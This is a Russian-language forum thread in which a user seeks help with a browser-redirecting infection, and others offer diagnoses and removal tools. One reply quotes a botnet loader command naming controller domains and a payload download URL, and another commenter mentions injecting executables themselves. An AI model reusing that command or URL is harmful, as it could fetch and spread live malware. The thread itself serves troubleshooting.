Вирус. Как избавиться?

http://s015.radikal.ru/i332/1010/a1/c17dcf378897.jpg - вот скрин


Суть проблемы: Постоянно выскакивает то предупреждение, которое справа внизу(точнее выскакивает при открытии браузера, переходе на сайт любой и т.д.)


Hosts нет ничего лишнего...

 

чето както похоже на аваст. те не кажется?)))
наверное лоадер какойто заразы пытается себя залить к тебе. качнуть свое тело или примочку с этого сайта. я в плане что сам лоадер уже у тя на тачке

 

это он и есть....
Я имел ввиду как избавиться от этого(точнее предупреждение убрать легко), а как избавиться от перенаправления на этот сайт?

P.S. сорри, просто я плохо в первом посте описал, что мне надо...

 

может сайт прописался как дом. страница в браузере, а антивирусник его блокирует!

 

хотя отключи "уведомления о блокировании" и живи счастливо!

 

нет, табличка выскакивает(т.е. меня перекидывает на этот сайт), даже тогда, когда я например, нажимаю "новые сообщения" тут на форуме

так не пойдет...

 

!config wheeeler.net k1ak1a.net eleonnora.net 9600 !load !67 http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131 9600

вот эту команду он сгрузить пытается

а тут лежит криптанутое тельце
http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131

 

проскань машину Dr.Web CureIt! или Kaspersky Virus Removal Tool

 

это куда девать??? :-[

Dr.Web CureIt! нашел только всякие старенькие бруты =(

 

твоя вирусня при коннекте исполняет эту команду.
и должна грузануть бинарник с
http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131

это вроде не ехе но думаю что ехе но закриптованый.


еслип ты не вкурил - то уже на твоей тачке крутится эта херь которая соединяется с этим сайтом и считывает с него команду конфиг. в этом конфиге прописан залив данных с http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131 а так как файер не дает ему ее прочитать то соответсна хвост он у тя слить не может

возми поставь микрософт нетворк монитор и определи из какого процесса идет запрос на соединение. думаю это просто дллка подгруженная. хотя я обычно инжектю копию ехе

 

как бы от этой хрени избавиться теперь....

 

sn0w, может это довнлоадер? тупо скачивает с того сайта троянские программы без ведома пользавателя.

 

А месэдж этот аваст выдаёт после запуска оперы, или периодически, если ваще никакой софт не загружен?

 

наверное стоит начать с удаления аваста..

 

при открытие любого сайта, при переходе по любой ссылке....я уже писал это

Наверное стоит переходить на linux, Ubuntu, etc

 

Оперу переустанови .

 

в других браузерах то же самое

 

правильно подметил!

 

А может у тебя этот сайт в прокси прописался? У меня разок попалась такая зараза, тоже каспер верещал куда не перейду - везде "опасносте!!! Отаке!!", оказалось во всех браузерах *чудом* настроилась работа через прокси *плохого дяди*

 

а можеш тупо в хостс файле заблокировать доступ на этот сайт